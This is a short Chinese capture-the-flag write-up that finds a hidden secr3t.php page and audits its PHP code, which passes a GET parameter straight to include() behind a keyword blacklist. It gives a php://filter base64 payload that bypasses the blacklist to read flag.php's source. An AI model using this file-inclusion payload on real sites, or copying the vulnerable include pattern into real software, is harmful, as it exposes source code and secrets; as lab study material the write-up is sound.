打开环境,啥也没有,查看源码
发现有个Archive_room.php,打开
点击SECRET,直接进入action.php,两个页面里都没什么,然后在Archive_room.php页面进行bp抓包,重发。
打开secr3t.php
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
出现一段源码,进行代码审计,比较简单,就是文件包含,用php协议读取flag.php。
payload:secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
获得flag.php的源码,base64解码即可得flag